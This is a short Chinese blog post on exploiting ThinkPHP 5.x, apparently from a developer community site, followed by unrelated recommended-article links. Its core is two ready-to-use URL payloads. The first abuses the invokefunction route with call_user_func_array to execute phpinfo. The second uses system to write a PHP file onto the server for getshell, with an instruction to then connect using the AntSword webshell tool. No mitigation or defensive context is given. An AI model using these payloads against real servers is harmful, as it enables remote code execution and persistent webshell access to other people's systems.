常见框架漏洞:Thinkphp(TP)篇

简介

ThinkPHP (简称 TP )是一款流行的 国产开源 PHP 框架 ,遵循 MVC(Model-View-Controller) 设计模式,以简洁、高效、灵活著称,广泛应用于国内中小型 Web 项目开发。

Thinkphp5x远程命令执行及getshell

原理

rce

过程

打开网站

复制代码
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1

在后面拼接指令即可

getshell

复制代码
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]
[]=echo "<?php phpinfo();?>" >>1.php

访问后使用蚁剑链接即可

相关推荐
漫步企鹅1 天前
【漏洞修复】为了修复ARM64 Android10系统的第三方库漏洞,将ARM64 Android16的系统库直接拷贝到Android10系统如何?
android·漏洞·修复·系统库
晓翔仔18 天前
利用 requestrepo 工具验证 XML外部实体注入漏洞
xml·网络安全·信息安全·渗透测试·漏洞
phper823 天前
在 Docker 中为 ThinkPHP 项目安装 PHP Redis 扩展并解决 500 错误
redis·docker·php·thinkphp
fendouweiqian1 个月前
thinkphp think-captcha 前后端分离 图形验证码
thinkphp
渗透测试老鸟-九青1 个月前
基于Electron的应用程序安全测试基础 — 提取和分析.asar文件的案例研究
网络·数据仓库·hive·hadoop·安全·网络安全·漏洞
ETO_冬1 个月前
ThinkPHP使用phpword读取模板word文件并添加表格
服务器·word·php·thinkphp
星尘安全1 个月前
黑客利用 Telegram API 传播新的 Golang 后门
网络安全·黑客·漏洞·远控·后门
ETO_冬1 个月前
FastAdmin后端列表导入表格数据
javascript·thinkphp·fastadmin
饮长安千年月2 个月前
西湖论剑决赛IoT开发板 rce复现
物联网·网络安全·漏洞